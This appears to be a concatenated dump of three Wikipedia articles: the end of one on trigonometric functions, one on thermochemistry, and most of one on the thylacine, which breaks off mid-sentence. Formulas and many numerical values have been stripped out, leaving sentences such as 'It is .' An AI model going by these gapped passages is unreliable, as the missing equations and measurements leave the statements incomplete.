equations, in a way that is similar to that of the above proof of Euler's identity. One can also use Euler's identity for expressing all trigonometric functions in terms of complex exponentials and using properties of the exponential function. Parity The cosine and the secant are even functions; the other trigonometric functions are odd functions. That is: Periods All trigonometric functions are periodic functions of period . This is the smallest period, except for the tangent and the cotangent, which have as smallest period. This means that, for every integer , one has Pythagorean identity The Pythagorean identity, is the expression of the Pythagorean theorem in terms of trigonometric functions. It is . Dividing through by either or gives and . Sum and difference formulas The sum and difference formulas allow expanding the sine, the cosine, and the tangent of a sum or a difference of two angles in terms of sines and cosines and tangents of the angles themselves. These can be derived geometrically, using arguments that date to Ptolemy. One can also produce them algebraically using Euler's formula. Sum Difference When the two angles are equal, the sum formulas reduce to simpler equations known as the double-angle formulae. These identities can be used to derive the product-to-sum identities. By setting all trigonometric functions of can be expressed as rational fractions of : Together with this is the tangent half-angle substitution, which reduces the computation of integrals and antiderivatives of trigonometric functions to that of rational fractions. Derivatives and antiderivatives The derivatives of trigonometric functions result from those of sine and cosine by applying the quotient rule. The values given for the antiderivatives in the following table can be verified by differentiating them. The number  is a constant of integration. Note: For the integral of can also be written as and for the integral of for as where is the inverse hyperbolic sine. Alternatively, the derivatives of the 'co-functions' can be obtained using trigonometric identities and the chain rule: Inverse functions The trigonometric functions are periodic, and hence not injective, so strictly speaking, they do not have an inverse function. However, on each interval on which a trigonometric function is monotonic, one can define an inverse function, and this defines inverse trigonometric functions as multivalued functions. To define a true inverse function, one must restrict the domain to an interval where the function is monotonic, and is thus bijective from this interval to its image by the function. The common choice for this interval, called the set of principal values, is given in the following table. As usual, the inverse trigonometric functions are denoted with the prefix "arc" before the name or its abbreviation of the function. The notations , , etc. are often used for and , etc. When this notation is used, inverse functions could be confused with multiplicative inverses. The notation with the "arc" prefix avoids such a confusion, though "arcsec" for arcsecant can be confused with "arcsecond". Just like the sine and cosine, the inverse trigonometric functions can also be expressed in terms of infinite series. They can also be expressed in terms of complex logarithms. Applications Angles and sides of a triangle In this section , , denote the three (interior) angles of a triangle, and , , denote the lengths of the respective opposite edges. They are related by various formulas, which are named by the trigonometric functions they involve. Law of sines The law of sines states that for an arbitrary triangle with sides , , and and angles opposite those sides , and : where is the area of the triangle, or, equivalently, where is the triangle's circumradius. It can be proved by dividing the triangle into two right ones and using the above definition of sine. The law of sines is useful for computing the lengths of the unknown sides in a triangle if two angles and one side are known. This is a common situation occurring in triangulation, a technique to determine unknown distances by measuring two angles and an accessible enclosed distance. Law of cosines The law of cosines (also known as the cosine formula or cosine rule) is an extension of the Pythagorean theorem: or equivalently, In this formula the angle at is opposite to the side . This theorem can be proved by dividing the triangle into two right ones and using the Pythagorean theorem. The law of cosines can be used to determine a side of a triangle if two sides and the angle between them are known. It can also be used to find the cosines of an angle (and consequently the angles themselves) if the lengths of all the sides are known. Law of tangents The law of tangents says that: . Law of cotangents If s is the triangle's semiperimeter, (a + b + c)/2, and r is the radius of the triangle's incircle, then rs is the triangle's area. Therefore Heron's formula implies that: . The law of cotangents says that: It follows that Periodic functions The trigonometric functions are also important in physics. The sine and the cosine functions, for example, are used to describe simple harmonic motion, which models many natural phenomena, such as the movement of a mass attached to a spring and, for small angles, the pendular motion of a mass hanging by a string. The sine and cosine functions are one-dimensional projections of uniform circular motion. Trigonometric functions also prove to be useful in the study of general periodic functions. The characteristic wave patterns of periodic functions are useful for modeling recurring phenomena such as sound or light waves. Under rather general conditions, a periodic function can be expressed as a sum of sine waves or cosine waves in a Fourier series. Denoting the sine or cosine basis functions by , the expansion of the periodic function takes the form: For example, the square wave can be written as the Fourier series In the animation of a square wave at top right it can be seen that just a few terms already produce a fairly good approximation. The superposition of several terms in the expansion of a sawtooth wave are shown underneath. History While the early study of trigonometry can be traced to antiquity, the trigonometric functions as they are in use today were developed in the medieval period. The chord function was discovered by Hipparchus of Nicaea (180–125 BCE) and Ptolemy of Roman Egypt (90–165 CE). The functions of sine and versine (1 – cosine) can be traced back to the jyā and koti-jyā functions used in Gupta period Indian astronomy (Aryabhatiya, Surya Siddhanta), via translation from Sanskrit to Arabic and then from Arabic to Latin. (See Aryabhata's sine table.) All six trigonometric functions in current use were known in Islamic mathematics by the 9th century, as was the law of sines, used in solving triangles. With the exception of the sine (which was adopted from Indian mathematics), the other five modern trigonometric functions were discovered by Persian and Arab mathematicians, including the cosine, tangent, cotangent, secant and cosecant. Al-Khwārizmī (c. 780–850) produced tables of sines, cosines and tangents. Circa 830, Habash al-Hasib al-Marwazi discovered the cotangent, and produced tables of tangents and cotangents. Muhammad ibn Jābir al-Harrānī al-Battānī (853–929) discovered the reciprocal functions of secant and cosecant, and produced the first table of cosecants for each degree from 1° to 90°. The trigonometric functions were later studied by mathematicians including Omar Khayyám, Bhāskara II, Nasir al-Din al-Tusi, Jamshīd al-Kāshī (14th century), Ulugh Beg (14th century), Regiomontanus (1464), Rheticus, and Rheticus' student Valentinus Otho. Madhava of Sangamagrama (c. 1400) made early strides in the analysis of trigonometric functions in terms of infinite series. (See Madhava series and Madhava's sine table.) The tangent function was brought to Europe by Giovanni Bianchini in 1467 in trigonometry tables he created to support the calculation of stellar coordinates. The terms tangent and secant were first introduced by the Danish mathematician Thomas Fincke in his book Geometria rotundi (1583). The 17th century French mathematician Albert Girard made the first published use of the abbreviations sin, cos, and tan in his book Trigonométrie. In a paper published in 1682, Gottfried Leibniz proved that is not an algebraic function of . Though introduced as ratios of sides of a right triangle, and thus appearing to be rational functions, Leibnitz result established that they are actually transcendental functions of their argument. The task of assimilating circular functions into algebraic expressions was accomplished by Euler in his Introduction to the Analysis of the Infinite (1748). His method was to show that the sine and cosine functions are alternating series formed from the even and odd terms respectively of the exponential series. He presented "Euler's formula", as well as near-modern abbreviations (sin., cos., tang., cot., sec., and cosec.). A few functions were common historically, but are now seldom used, such as the chord, versine (which appeared in the earliest tables), haversine, coversine, half-tangent (tangent of half an angle), and exsecant. List of trigonometric identities shows more relations between these functions. Historically, trigonometric functions were often combined with logarithms in compound functions like the logarithmic sine, logarithmic cosine, logarithmic secant, logarithmic cosecant, logarithmic tangent and logarithmic cotangent. Etymology The word derives from Latin sinus, meaning "bend; bay", and more specifically "the hanging fold of the upper part of a toga", "the bosom of a garment", which was chosen as the translation of what was interpreted as the Arabic word jaib, meaning "pocket" or "fold" in the twelfth-century translations of works by Al-Battani and al-Khwārizmī into Medieval Latin. The choice was based on a misreading of the Arabic written form j-y-b (), which itself originated as a transliteration from Sanskrit , which along with its synonym (the standard Sanskrit term for the sine) translates to "bowstring", being in turn adopted from Ancient Greek "string". The word tangent comes from Latin tangens meaning "touching", since the line touches the circle of unit radius, whereas secant stems from Latin secans—"cutting"—since the line cuts the circle. The prefix "co-" (in "cosine", "cotangent", "cosecant") is found in Edmund Gunter's Canon triangulorum (1620), which defines the cosinus as an abbreviation for the sinus complementi (sine of the complementary angle) and proceeds to define the cotangens similarly.
Mathematics
Geometry
null
30369
https://en.wikipedia.org/wiki/Thermochemistry
Thermochemistry
Thermochemistry is the study of the heat energy which is associated with chemical reactions and/or phase changes such as melting and boiling. A reaction may release or absorb energy, and a phase change may do the same. Thermochemistry focuses on the energy exchange between a system and its surroundings in the form of heat. Thermochemistry is useful in predicting reactant and product quantities throughout the course of a given reaction. In combination with entropy determinations, it is also used to predict whether a reaction is spontaneous or non-spontaneous, favorable or unfavorable. Endothermic reactions absorb heat, while exothermic reactions release heat. Thermochemistry coalesces the concepts of thermodynamics with the concept of energy in the form of chemical bonds. The subject commonly includes calculations of such quantities as heat capacity, heat of combustion, heat of formation, enthalpy, entropy, and free energy. Thermochemistry is one part of the broader field of chemical thermodynamics, which deals with the exchange of all forms of energy between system and surroundings, including not only heat but also various forms of work, as well the exchange of matter. When all forms of energy are considered, the concepts of exothermic and endothermic reactions are generalized to exergonic reactions and endergonic reactions. History Thermochemistry rests on two generalizations. Stated in modern terms, they are as follows: Lavoisier and Laplace's law (1780): The energy change accompanying any transformation is equal and opposite to energy change accompanying the reverse process. Hess' law of constant heat summation (1840): The energy change accompanying any transformation is the same whether the process occurs in one step or many. These statements preceded the first law of thermodynamics (1845) and helped in its formulation. Thermochemistry also involves the measurement of the latent heat of phase transitions. Joseph Black had already introduced the concept of latent heat in 1761, based on the observation that heating ice at its melting point did not raise the temperature but instead caused some ice to melt. Gustav Kirchhoff showed in 1858 that the variation of the heat of reaction is given by the difference in heat capacity between products and reactants: dΔH / dT = ΔCp. Integration of this equation permits the evaluation of the heat of reaction at one temperature from measurements at another temperature. Calorimetry The measurement of heat changes is performed using calorimetry, usually an enclosed chamber within which the change to be examined occurs. The temperature of the chamber is monitored either using a thermometer or thermocouple, and the temperature plotted against time to give a graph from which fundamental quantities can be calculated. Modern calorimeters are frequently supplied with automatic devices to provide a quick read-out of information, one example being the differential scanning calorimeter. Systems Several thermodynamic definitions are very useful in thermochemistry. A system is the specific portion of the universe that is being studied. Everything outside the system is considered the surroundings or environment. A system may be: a (completely) isolated system which can exchange neither energy nor matter with the surroundings, such as an insulated bomb calorimeter a thermally isolated system which can exchange mechanical work but not heat or matter, such as an insulated closed piston or balloon a mechanically isolated system which can exchange heat but not mechanical work or matter, such as an uninsulated bomb calorimeter a closed system which can exchange energy but not matter, such as an uninsulated closed piston or balloon an open system which it can exchange both matter and energy with the surroundings, such as a pot of boiling water Processes A system undergoes a process when one or more of its properties changes. A process relates to the change of state. An isothermal (same-temperature) process occurs when temperature of the system remains constant. An isobaric (same-pressure) process occurs when the pressure of the system remains constant. A process is adiabatic when no heat exchange occurs.
Physical sciences
Thermodynamics
Chemistry
30388
https://en.wikipedia.org/wiki/Thylacine
Thylacine
The thylacine (; binomial name Thylacinus cynocephalus), also commonly known as the Tasmanian tiger or Tasmanian wolf, is an extinct carnivorous marsupial that was native to the Australian mainland and the islands of Tasmania and New Guinea. The thylacine died out in New Guinea and mainland Australia around 3,600–3,200 years ago, prior to the arrival of Europeans, possibly because of the introduction of the dingo, whose earliest record dates to around the same time, but which never reached Tasmania. Prior to European settlement, around 5,000 remained in the wild on Tasmania. Beginning in the nineteenth century, they were perceived as a threat to the livestock of farmers and bounty hunting was introduced. The last known of its species died in 1936 at Hobart Zoo in Tasmania. The thylacine is widespread in popular culture and is a cultural icon in Australia. The thylacine was known as the Tasmanian tiger because of the dark transverse stripes that radiated from the top of its back, and it was called the Tasmanian wolf because it resembled a medium- to large-sized canid. The name thylacine is derived from thýlakos meaning "pouch" and ine meaning "pertaining to", and refers to the marsupial pouch. Both sexes had a pouch. The females used theirs for rearing young, and the males used theirs as a protective sheath, covering the external reproductive organs. The animal had a stiff tail and could open its jaws to an unusual extent. Recent studies and anecdotal evidence on its predatory behaviour suggest that the thylacine was a solitary ambush predator specialised in hunting small- to medium-sized prey. Accounts suggest that, in the wild, it fed on small birds and mammals. It was the only member of the genus Thylacinus and family Thylacinidae to have survived until modern times. Its closest living relatives are the other members of Dasyuromorphia, including the Tasmanian devil, from which it is estimated to have split 42–36 million years ago. Intensive hunting on Tasmania is generally blamed for its extinction, but other contributing factors were disease, the introduction of and competition with dingoes, human encroachment into its habitat and climate change. The remains of the last known thylacine were discovered at the Tasmanian Museum and Art Gallery in 2022. Since extinction there have been numerous searches and reported sightings of live animals, none of which have been confirmed. The thylacine has been used extensively as a symbol of Tasmania. The animal is featured on the official coat of arms of Tasmania. Since 1996, National Threatened Species Day has been commemorated in Australia on 7 September, the date on which the last known thylacine died in 1936. Universities, museums and other institutions across the world research the animal. Its whole genome sequence has been mapped, and there are efforts to clone and bring it back to life. Taxonomic and evolutionary history Numerous examples of thylacine engravings and rock art have been found, dating back to at least 1000 BC. Petroglyph images of the thylacine can be found at the Dampier Rock Art Precinct, on the Burrup Peninsula in Western Australia. By the time the first European explorers arrived, the animal was already extinct in mainland Australia and New Guinea and rare in Tasmania. Europeans may have encountered it in Tasmania as far back as 1642, when Abel Tasman first arrived in Tasmania. His shore party reported seeing the footprints of "wild beasts having claws like a Tyger". Marc-Joseph Marion du Fresne, arriving with the Mascarin in 1772, reported seeing a "tiger cat". The first definitive encounter was by French explorers on 13 May 1792, as noted by the naturalist Jacques Labillardière, in his journal from the expedition led by d'Entrecasteaux. In 1805, William Paterson, the Lieutenant Governor of Tasmania, sent a detailed description for publication in the Sydney Gazette. He also sent a description of the thylacine in a letter to Joseph Banks, dated 30 March 1805. The first detailed scientific description was made by Tasmania's Deputy Surveyor-General, George Harris, in 1808, five years after first European settlement of the island. Harris originally placed the thylacine in the genus Didelphis, which had been created by Linnaeus for the American opossums, describing it as Didelphis cynocephala, the "dog-headed opossum". Recognition that the Australian marsupials were fundamentally different from the known mammal genera led to the establishment of the modern classification scheme, and in 1796, Geoffroy Saint-Hilaire created the genus Dasyurus, where he placed the thylacine in 1810. To maintain gender agreement with the genus name, the species name was altered to cynocephalus. In 1824, it was separated out into its own genus, Thylacinus, by Temminck. The common name derives directly from the genus name, originally from the Greek (), meaning "pouch" or "sack" and ine meaning "pertaining to". The name is pronounced or . Evolution The earliest records of the modern thylacine are from the Early Pleistocene, with the oldest known fossil record in southeastern Australia from the Calabrian age around 1.77–0.78 million years ago. Specimens from the Pliocene-aged Chinchilla Fauna, described as Thylacinus rostralis by Charles De Vis in 1894, have in the past been suggested to represent Thylacinus cynocephalus, but have been shown to either have been curatorial errors, or ambiguous in their specific attribution. The family Thylacinidae includes at least 12 species in eight genera. Thylacinids are estimated to have split from other members of Dasyuromorphia around 42–36 million years ago. The earliest representative of the family is Badjcinus turnbulli from the Late Oligocene of Riversleigh in Queensland, around 25 million years ago. Early thylacinids were quoll-sized, well under . It probably ate insects and small reptiles and mammals, although signs of an increasingly-carnivorous diet can be seen as early as the early Miocene in Wabulacinus. Members of the genus Thylacinus are notable for a dramatic increase in both the expression of carnivorous dental traits and in size, with the largest species, Thylacinus potens and Thylacinus megiriani, both approaching the size of a wolf. In late Pleistocene and early Holocene times, the modern thylacine was widespread (although never numerous) throughout Australia and New Guinea. A classic example of convergent evolution, the thylacine showed many similarities to the members of the dog family, Canidae, of the Northern Hemisphere: sharp teeth, powerful jaws, raised heels, and the same general body form. Since the thylacine filled the same ecological niche in Australia and New Guinea as canids did elsewhere, it developed many of the same features. Despite this, as a marsupial, it is unrelated to any of the Northern Hemisphere placental mammal predators. The thylacine is a basal member of the Dasyuromorphia, along with numbats, dunnarts, wambengers, and quolls. The cladogram follows: Phylogeny of Thylacinidae after Rovinsky et al. (2019) Description The only recorded species of Thylacinus, a genus that superficially resembles the dogs and foxes of the family Canidae, the animal was a predatory marsupial that existed on mainland Australia during the Holocene epoch and was observed by Europeans on the island of Tasmania; the species is known as the Tasmanian tiger for the striped markings of the pelage. Descriptions of the thylacine come from preserved specimens, fossil records, skins and skeletal remains, and black and white photographs and film of the animal both in captivity and from the field. The thylacine resembled a large, short-haired dog with a stiff tail which smoothly extended from the body in a way similar to that of a kangaroo. The mature thylacine measured about in shoulder height and in body length, excluding the tail which measured around . Because the recorded body mass estimates are scant, it has been suggested that they may have weighed anywhere from , but a 2020 study that examined 93 adult specimens, with 40 of the specimens' sexes being known, argued that their average body mass would be with a range of based on volumetric analysis. There was slight sexual dimorphism, with the males being larger than females on average. Males weighed on average , and females on average weighed . The skull is noted to be highly convergent on those of canids, most closely resembling that of the red fox. Thylacines, uniquely for marsupials, had largely cartilaginous epipubic bones with a highly reduced osseous element. This was once considered a synapomorphy with sparassodonts, though it is now thought that both groups reduced their epipubics independently. Its yellow-brown coat featured 15 to 20 distinctive dark stripes across its back, rump and the base of its tail, which earned the animal the nickname "tiger". The stripes were more pronounced in younger specimens, fading as the animal got older. One of the stripes extended down the outside of the rear thigh. Its body hair was dense and soft, up to in length. Colouration varied from light fawn to a dark brown; the belly was cream-coloured. Its rounded, erect ears were about long and covered with short fur. The early scientific studies suggested it possessed an acute sense of smell which enabled it to track prey, but analysis of its brain structure revealed that its olfactory bulbs were not well developed. It is likely to have relied on sight and sound when hunting instead. In 2017, Berns and Ashwell published comparative cortical maps of thylacine and Tasmanian devil brains, showing that the thylacine had a larger, more modularised basal ganglion. The authors associated these differences with the thylacine's more predatory lifestyle. Analysis of the forebrain published in 2023 suggested that it was similar in morphology to other dasyuromorph marsupials and dissimilar to that of canids. The thylacine was able to open its jaws to an unusual extent: up to 80 degrees. This capability can be seen in part in David Fleay's short black-and-white film sequence of a captive thylacine from 1933. The jaws were muscular, and had 46 teeth, but studies show the thylacine jaw was too weak to kill sheep. The tail vertebrae were fused to a degree, with resulting restriction of full tail movement. Fusion may have occurred as the animal reached full maturity. The tail tapered towards the tip. In juveniles, the tip of the tail had a ridge. The female thylacine had a pouch with four teats, but unlike many other marsupials, the pouch opened to the rear of its body. Males had a scrotal pouch, unique amongst the Australian marsupials, into which they could withdraw their scrotal sac for protection. Thylacine footprints could be distinguished from other native or introduced animals; unlike foxes, cats, dogs, wombats, or Tasmanian devils, thylacines had a very large rear pad and four obvious front pads, arranged in almost a straight line. The hindfeet were similar to the forefeet but had four digits rather than five. Their claws were non-retractable. The plantar pad is tri-lobal in that it exhibits three distinctive lobes. It is a single plantar pad divided by three deep grooves. The distinctive plantar pad shape along with the asymmetrical nature of the foot makes it quite different from animals such as dogs or foxes. The thylacine was noted as having a stiff and somewhat awkward gait, making it unable to run at high speed. It could also perform a bipedal hop, in a fashion similar to a kangaroo—demonstrated at various times by captive specimens. Guiler speculates that this was used as an accelerated form of motion when the animal became alarmed. The animal was also able to balance on its hind legs and stand upright for brief periods. Observers of the animal in the wild and in captivity noted that it would growl and hiss when agitated, often accompanied by a threat-yawn. During hunting, it would emit a series of rapidly repeated guttural cough-like barks (described as "yip-yap", "cay-yip" or "hop-hop-hop"), probably for communication between the family pack members. It also had a long whining cry, probably for identification at distance, and a low snuffling noise used for communication between family members. Some observers described it as having a strong and distinctive smell, others described a faint, clean, animal odour, and some no odour at all. It is possible that the thylacine, like its relative, the Tasmanian devil, gave off an odour when agitated. Distribution and habitat The thylacine most likely preferred the dry eucalyptus forests, wetlands, and grasslands of mainland Australia. Indigenous Australian rock paintings indicate that the thylacine lived throughout mainland Australia and New Guinea. Proof of the animal's existence in mainland Australia came from a desiccated carcass that was discovered in a cave in the Nullarbor Plain in Western Australia in 1990; carbon dating revealed it to be around 3,300 years old. Recently examined fossilised footprints also suggest historical distribution of the species on Kangaroo Island. The northernmost record of the species is from the Kiowa rock shelter in Chimbu Province in the highlands of Papua New Guinea, dating to the Early Holocene, around 10,000–8,500 years Before Present. In 2017, White, Mitchell and Austin published a large-scale analysis of thylacine mitochondrial genomes, showing that they had split into eastern and western populations on the mainland prior to the Last Glacial Maximum and that Tasmanian thylacines had a low genetic diversity by the time of European arrival. In Tasmania, they preferred the woodlands of the midlands and coastal heath, which eventually became the primary focus of British settlers seeking grazing land for their livestock. The striped pattern may have provided camouflage in woodland conditions, but it may have also served for identification purposes. The species had a typical home range of between . It appears to have kept to its home range without being territorial; groups too large to be a family unit were sometimes observed together. Ecology and behaviour Reproduction There is evidence for at least some year-round breeding (cull records show joeys discovered in the pouch at all times of the year), although the peak breeding season was in winter and spring. They would produce up to four joeys per litter (typically two or three), carrying the young in a pouch for up to three months and protecting them until they were at least half adult size. Early pouch young were hairless and blind, but they had their eyes open and were fully furred by the time they left the pouch. The young also had their own pouches that were not visible until they were 9.5 weeks old. After leaving the pouch, and until they were developed enough to assist, the juveniles would remain in the lair while their mother hunted. Thylacines only once bred successfully in captivity, in Melbourne Zoo in 1899. Their life expectancy in the wild is estimated to have been 5 to 7 years, although captive specimens survived up to 9 years. In 2018, Newton et al. collected and CT-scanned all known preserved thylacine pouch young specimens to digitally reconstruct their development throughout their entire window of growth in their mother's pouch. This study revealed new information on the biology of the thylacine, including the growth of its limbs and when it developed its 'dog-like' appearance. It was found that two of the thylacine young in the Tasmanian Museum and Art Gallery (TMAG) were misidentified and of another species, reducing the number of known pouch young specimens to 11 worldwide. One of four specimens kept at Museum Victoria has been serially sectioned, allowing an in-depth investigation of its internal tissues and providing some insights into thylacine pouch young development, biology, immunology and ecology. Feeding and diet The thylacine was an apex predator, though exactly how large its prey animals could be is disputed. It was a nocturnal and crepuscular hunter, spending the daylight hours in small caves or hollow tree trunks in a nest of twigs, bark, or fern fronds. It tended to retreat to the hills and forest for shelter during the day and hunted in the open heath at night. Early observers noted that the animal was typically shy and secretive, with awareness of the presence of humans and generally avoiding contact, although it occasionally showed inquisitive traits. At the time, much stigma existed in regard to its "fierce" nature; this is likely to be due to its perceived threat to agriculture. Historical accounts suggest that in the wild, the thylacine preyed on small mammals and birds, with waterbirds being the most commonly recorded bird prey, with historical accounts of thylacines predating on black ducks and teals with coots, Tasmanian nativehens, swamphens, herons (Ardea) and black swans also being likely items of prey. The thylacine may also have preyed upon the now extinct Tasmanian emu. The most commonly recorded mammalian prey was the red-necked wallaby, with other recorded prey including the Tasmanian pademelon and the short-beaked echidna. Other probable native mammalian prey includes other marsupials like bandicoots and brushtail possums, as well as native rodents like water rats. Following their introduction to Tasmania, European rabbits rapidly multiplied and became abundant across the island, with a number of accounts reporting the predation of rabbits by thylacines. Some accounts also suggest that the thylacine may have preyed on lizards, frogs and fish. European settlers believed the thylacine to prey regularly upon farmers' sheep and poultry. However, analysis by Robert Paddle suggests that there is little evidence that thylacines were significant predators of sheep or poultry (though some accounts suggest that they may have attacked them on occasion), with many sheep deaths likely caused by feral dog attacks instead. Throughout the 20th century, the thylacine was often characterised as primarily a blood drinker; according to Robert Paddle, the story's popularity seems to have originated from a single second-hand account heard by Geoffrey Smith (1881–1916) in a shepherd's hut. Recent studies suggest that the thylacine was probably not suited for hunting large prey. A 2007 study argued that, while it could open its jaws wide like modern mammalian predators that consume large prey, the canine of the thylacine was not suited for slashing bites like that of large canids, indicating, based on the assumption that the bite was largely derived by its skull, that it hunted small to medium-sized prey as a solitary hunter. A 2011 study by the University of New South Wales using advanced computer modelling indicated that the thylacine had surprisingly feeble jaws; animals usually take prey close to their own body size, but an adult thylacine of around was found to be incapable of handling prey much larger than , suggesting that the thylacine only ate smaller animals such as bandicoots, pademelons and possums, and that it may have directly competed with the Tasmanian devil and the tiger quoll. Another study in 2020 produced similar results, after estimating the average body mass of thylacine as about rather than , suggesting that the animal did indeed hunt much smaller prey. The cranial and facial morphology also indicate that the thylacine would have hunted prey less than 45% of its own body mass, consistent with modern carnivores weighing under which is about the average size of a thylacine. A 2005 study showed that the thylacine had a high bite force quotient of 166, which was similar to that of most quolls, indicating that it may have been able to hunt larger prey relative to its body size. A 2007 study also suggested that it would have had a much stronger bite force than a dingo of similar size, though this particular study argued that the thylacine would have hunted smaller prey. A biomechanical analysis of the 3D skull model suggested that the thylacine would have likely consumed smaller prey, with its skull displaying high levels of stress that are not suited to withstand forces, and with its bite forces being estimated at a smaller value than that of Tasmanian devils. A 2014 study compared the skull of a thylacine with that of modern dasyurids and an earlier thylacinid taxon Nimbacinus based on biomechanical analysis of their 3D skull models; the authors suggested that while Nimbacinus was suited to hunt large prey with a maximum muscle force of which are similar to that of large Tasmanian devils, the thylacine skull displayed a much higher stress in all areas compared to its relatives due to its longer snout. If the thylacine were indeed specialised for small prey, this specialisation likely made it susceptible to small disturbances to the ecosystem. It has been suggested on the basis of the canine teeth and limb bones that the thylacine was a solitary pounce-pursuit predator that hunted smaller prey with trophic niches similar to relatively smaller canids like the coyote, and that it was not as specialised as large canids, hyaenids and felids of today: its canine lacked the adaptation for producing slashing or deep penetrating bites, and its anatomy was not suited for running fast in high speed. However, the trappers reported it as an ambush predator hunting alone or in pairs mainly at night. The elbow joint morphology and the forelimb anatomy of the thylacine also suggest that the animal was most likely an ambush predator. The stomach of a thylacine was very muscular, capable of distending to allow the animal to eat large amounts of food at one time, probably an adaptation to compensate for long periods when hunting was unsuccessful and food scarce. In captivity, thylacines were fed a wide variety of foods, including dead rabbits and wallabies as well as beef, mutton, horse and, occasionally, poultry. There is a report of a captive thylacine that refused to eat dead wallaby flesh or to kill and eat a live wallaby offered to it, but "ultimately it was persuaded to eat by having the smell of blood from a freshly killed wallaby put before its nose." Extinction Dying out on the Australian mainland Australia lost more than 90% of its megafauna around 50–40,000 years ago as part of the Quaternary extinction event, with the notable exceptions of several kangaroo and wombat species, emus, cassowaries, large goannas, and the thylacine. The extinctions included the even larger carnivore Thylacoleo carnifex (sometimes called the marsupial lion) which was only distantly related to the thylacine. A 2010 paper examining this issue showed that humans were likely to be one of the major factors in the extinction of many species in Australia although the authors of the research warned that one-factor explanations might be over-simplistic. The youngest radiocarbon dates of the thylacine in mainland Australia are around 3,500 years old, with an estimated extinction date around 3,200 years ago, synchronous with that of Tasmanian devil, and closely co-inciding with the earliest records of the dingo, as well as an intensification of human activity. A study proposes that the dingo may have led to the extinction of the thylacine in mainland Australia because the dingo outcompeted the thylacine in preying on the Tasmanian nativehen. The dingo is also more likely to hunt in packs than the more solitary thylacine. Examinations of dingo and thylacine skulls show that although the dingo had a weaker bite, its skull could resist greater stresses, allowing it to pull down larger prey than the thylacine. Because it was a hypercarnivore, the thylacine was less versatile in its diet than the omnivorous dingo. Their ranges appear to have overlapped because thylacine subfossil remains have been discovered near those of dingoes. Aside from wild dingoes, the adoption of the dingo as a hunting companion by the indigenous peoples would have put the thylacine under increased pressure. A 2013 study suggested that, while dingoes were a contributing factor to the thylacine's demise on the mainland, larger factors were the intense human population growth, technological advances, and the abrupt change in the climate during the period. A report published in the Journal of Biogeography detailed an investigation into the mitochondrial DNA and radio-carbon dating of thylacine bones. It concluded that the thylacine died out on mainland Australia in a relatively short time span. Ken Mulvaney has suggested, based on the high number of rock carvings of the thylacine on the Burrup Peninsula, Aboriginal Australians were aware of, and concerned about the thylacine’s dwindling numbers around that time. Dying out on Tasmania Although the thylacine had died out on mainland Australia, it survived into the 1930s on the island of Tasmania. At the time of the first European settlement, the heaviest distributions were in the northeast, northwest and north-midland regions of the state. There were an estimated 5,000 at the time. They were rarely sighted but slowly began to be credited with numerous attacks on sheep. This led to the establishment of bounty schemes in an attempt to control their numbers. The Van Diemen's Land Company introduced bounties on the thylacine from as early as 1830, and between 1888 and 1909, the Tasmanian government paid £1 per head for dead adult thylacines and ten shillings for pups. In all, they paid out 2,184 bounties, but it is thought that many more thylacines were killed than were claimed for. Its extinction is popularly attributed to these relentless efforts by farmers and bounty hunters. Aside from persecution, it is likely that multiple factors rapidly compounded its decline and eventual extinction, including competition with wild dogs introduced by European settlers, erosion of its habitat, already-low genetic diversity, the concurrent extinction or decline of prey species, and a distemper-like disease that affected many captive specimens at the time. A study from 2012 suggested that the disease was likely introduced by humans, and that it was also present in the wild population. The marsupi-carnivore disease, as it became known, dramatically reduced the lifespan of the animal and greatly increased pup mortality. A 1921 photo by Henry Burrell of a thylacine with a chicken was widely distributed and may have helped secure the animal's reputation as a poultry thief. The image had been cropped to hide the fact that the animal was in captivity, and analysis by one researcher has concluded that this thylacine was a dead specimen, posed for the camera. The photograph may even have involved photo manipulation. The animal had become extremely rare in the wild by the late 1920s. Despite the fact that the thylacine was believed by many to be responsible for attacks on sheep, in 1928 the Tasmanian Advisory Committee for Native Fauna recommended a reserve similar to the Savage River National Park to protect any remaining thylacines, with potential sites of suitable habitat including the Arthur-Pieman area of western Tasmania. By the beginning of the 20th century, the increasing rarity of thylacines led to increased demand for captive specimens by zoos around the world, placing yet more pressure on an already small population. Despite the export of breeding pairs, attempts at rearing thylacines in captivity were unsuccessful, and the last thylacine outside Australia died at the London Zoo in 1931. The last known thylacine to be killed in the wild was shot in 1930 by Wilf Batty, a farmer from Mawbanna in the state's northwest. The animal, believed to have been a male, had been seen around Batty's house for several weeks. Work in 2012 examined the relationship of the genetic diversity of the thylacines before their extinction. The results indicated that the last of the thylacines in Tasmania had limited genetic diversity due to their complete geographic isolation from mainland Australia. Further investigations in 2017 showed evidence that this decline in genetic diversity started long before the arrival of humans in Australia, possibly starting as early as 70–120 thousand years ago. The thylacine held the status of endangered species until the 1980s. International standards at the time stated that an animal could not be declared extinct until 50 years had passed without a confirmed record. Since no definitive proof of the thylacine's existence in the wild had been obtained for more than 50 years, it met that official criterion and was declared extinct by the International Union for Conservation of Nature in 1982 and by the Tasmanian government in 1986. The species was removed from Appendix I of the Convention on International Trade in Endangered Species of Wild Fauna and Flora (CITES) in 2013. Last of the species The last captive thylacine, lived as an endling (the known last of its species) at Hobart Zoo until its death on the night of 7 September 1936. The animal, a female, was captured by Elias Churchill with a snare trap and was sold to the zoo in May 1936. The sale was not publicly announced because the use of traps was illegal and Churchill could have been fined. After its death, the remains of the endling were transferred to the Tasmanian Museum and Art Gallery. The remains were not properly recorded by the museum because the animal had been caught illegally. It lay undiscovered for decades until a taxidermist record dated from 1936 or 1937 mentioning the animal was noticed. This led to a full audit of all thylacine remains at the museum and the endling's successful identification at the end of 2022. In 1968, Frank Darby invented a myth that the endling was called Benjamin. The myth was widely circulated in the media, with Wikipedia itself repeating the invention. The thylacine that Darby was referring to was a female at Hobart Zoo. This animal is believed to have died as the result of neglect—locked out of its sheltered sleeping quarters, it was exposed to a rare occurrence of extreme Tasmanian weather: extreme heat during the day and freezing temperatures at night. This thylacine features in the last known motion picture footage of a living specimen: 45 seconds of black-and-white footage showing the thylacine in its enclosure in a clip taken in 1933, by naturalist David Fleay. In the film footage, the thylacine is seen seated, walking around the perimeter of its enclosure, yawning, sniffing the air, scratching itself (in the same manner as a dog), and lying down. Fleay was bitten on the buttock whilst shooting the film. In 2021, a digitally colourised 80-second clip of Fleay's footage of the thylacine was released by the National Film and Sound Archive of Australia, to mark National Threatened Species Day. The digital colourisation process was based on historic primary and secondary descriptions to ensure an accurate colour match. Although there had been a conservation movement pressing for the thylacine's protection since 1901, driven in part by the increasing difficulty in obtaining specimens for overseas collections, political difficulties prevented any form of protection coming into force until 1936. Official protection of the species by the Tasmanian government came all too late; it was introduced on 10 